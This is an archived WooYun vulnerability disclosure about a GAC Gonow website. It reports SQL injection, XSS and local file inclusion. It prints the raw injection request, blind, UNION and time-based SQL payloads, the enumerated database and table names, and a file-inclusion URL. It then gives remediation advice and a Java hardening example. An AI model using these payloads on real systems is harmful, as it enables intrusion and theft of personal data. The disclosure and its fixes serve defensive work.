WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2015-09-22: Details notified to the vendor; awaiting the vendor's handling
2015-09-23: CNCERT (National Internet Emergency Center) has not yet been able to contact the responsible unit; details disclosed only to the reporting agency
2015-10-03: Details disclosed to core white hats and experts in related fields
2015-10-13: Details disclosed to regular white hats
2015-10-23: Details disclosed to intern white hats
2015-11-07: Details disclosed to the public
Multiple vulnerabilities: SQL injection, XSS, local file inclusion and others.
1. SQL injection
2. XSS (cross-site scripting)
3. Local file inclusion

GAC Gonow (广汽吉奥):
http://**.**.**.**/
1. SQL injection vulnerability

1.1 Injection point
POST /service/manage/searchProgress.jsp HTTP/1.1
Cache-Control: no-cache
Referer: http://**.**.**.**/service/service_jsp_catid_222.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 Netsparker
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: **.**.**.**
Cookie: JSESSIONID=abcw8GrD2ghUA5zdraG-u
Accept-Encoding: gzip, deflate
Content-Length: 54
Content-Type: application/x-www-form-urlencoded

search_name=Smith&search_phone=%27+OR+%27ns%27%3d%27ns
1.2 Databases involved
Place: POST
Parameter: search_phone
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search_name=Smith&search_phone=' OR 'ns'='ns' AND 2140=2140 AND 'emIK'='emIK

    Type: UNION query
    Title: MySQL UNION query (NULL) - 15 columns
    Payload: search_name=Smith&search_phone=' OR 'ns'='ns' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a6f78773a,0x514146754c41434a434d,0x3a70757a3a), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: search_name=Smith&search_phone=' OR 'ns'='ns' AND SLEEP(5) AND 'RgwA'='RgwA
---
[19:51:28] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.25
back-end DBMS: MySQL 5.0.11
[19:51:28] [INFO] fetching database names
available databases [3]:
[*] gonow
[*] information_schema
[*] test
1.3 One of the databases
Database: gonow
[74 tables]
+-------------------------------+
| ad                            |
| cms_archive                   |
| cms_archive_backup            |
| cms_archive_hist              |
| cms_archive_keyword           |
| cms_archive_right             |
| cms_pic_permission            |
| cms_read_history              |
| hrs3_base_info                |
| hrs3_certificate              |
| hrs3_education                |
| hrs3_experience               |
| hrs3_position                 |
| hrs3_position_resume          |
| hrs3_positionanduserinfo      |
| hrs3_resume                   |
| hrs3_training                 |
| hrs3_users                    |
| hrs3_usersinfo                |
| hsr3_resumeanduserinfo        |
| hsr3_resumeinfo               |
| nds_car                       |
| nds_car_sell                  |
| nds_car_series                |
| nds_car_type                  |
| nds_dealer                    |
| nds_dealer_back               |
| nds_service                   |
| nds_service_back              |
| prj_e_bookingcar              |
| prj_e_configuration           |
| prj_e_drive                   |
| prj_e_userinfo                |
| prj_fitting_car               |
| prj_fitting_list              |
| prj_nds_applytry              |
| prj_nds_onlinebook            |
| prj_service_message           |
| prj_service_questions         |
| prj_service_questions_support |
| sys_InfoUser                  |
| sys_SysopIP                   |
| sys_category                  |
| sys_category_hist             |
| sys_class                     |
| sys_class_role                |
| sys_class_role_hist           |
| sys_class_user                |
| sys_class_user_hist           |
| sys_depart                    |
| sys_depart_list               |
| sys_detail                    |
| sys_dict                      |
| sys_dicttype                  |
| sys_file                      |
| sys_filesetting               |
| sys_guestbook                 |
| sys_infodepart                |
| sys_infogroup                 |
| sys_infouser                  |
| sys_infouserread              |
| sys_operationlog              |
| sys_role                      |
| sys_role_item                 |
| sys_sequence                  |
| sys_subcategory               |
| sys_sysopdetail               |
| sys_sysopip                   |
| sys_sysoplogin                |
| sys_version                   |
| sys_zone                      |
| sysop                         |
| sysop_role                    |
| sysop_role_hist               |
+-------------------------------+
2. XSS in the official site's search module:
http://**.**.**.**/search/search_ar.jsp
3. Local file inclusion vulnerability
http://**.**.**.**/public/download.jsp?file=%2fpublic%2fdownload.jsp
<Did not continue the penetration; it would take too much time.>
1. SQL injection
2. XSS
3. File inclusion
1. SQL injection: filter the parameters
2. XSS: restrict special characters
3. File inclusion: filter the parameter of that page
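As an added example (not the vendor's code), one way to implement the three fixes above for the handlers named in this report; the table and column names, the class name and the download root are assumptions, since the report only shows the URLs.

```java
// Added example, not the site's own code: hardened handlers for the three
// remediation items. Table/column names and the download root are assumed.
import java.io.File;
import java.io.IOException;
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

public class GonowHardening {
    // Item 1 (searchProgress.jsp): bind search_phone instead of concatenating it
    // into the SQL text, so "' OR 'ns'='ns" is compared literally as a phone value.
    public static ResultSet searchProgress(Connection conn, String name, String phone)
            throws SQLException {
        String sql = "SELECT id, status FROM prj_service_message "   // assumed table/columns
                   + "WHERE customer_name = ? AND customer_phone = ?";
        PreparedStatement ps = conn.prepareStatement(sql);
        ps.setString(1, name);
        ps.setString(2, phone);
        return ps.executeQuery();
    }

    // Item 2 (search_ar.jsp): encode the search term before echoing it into HTML
    // so markup characters are rendered as text rather than interpreted.
    public static String htmlEscape(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            switch (c) {
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '&':  sb.append("&amp;");  break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // Item 3 (download.jsp): resolve the requested file under a fixed download
    // directory and refuse any path that canonicalises outside it, so the
    // servlet cannot be made to serve its own source or other site files.
    public static File resolveDownload(File downloadRoot, String requested) throws IOException {
        String root = downloadRoot.getCanonicalPath();
        File candidate = new File(downloadRoot, requested).getCanonicalFile();
        if (!candidate.getPath().startsWith(root + File.separator)) {
            throw new IOException("requested path escapes the download directory");
        }
        return candidate;
    }
}
```

Canonicalising before the prefix check also resolves symlinks and `..` segments, which a plain string filter on the parameter would miss.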
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2015-09-23 16:11
CNVD confirmed the reported vulnerabilities; no direct handling channel with the website's administering unit has been established yet, pending claim.
None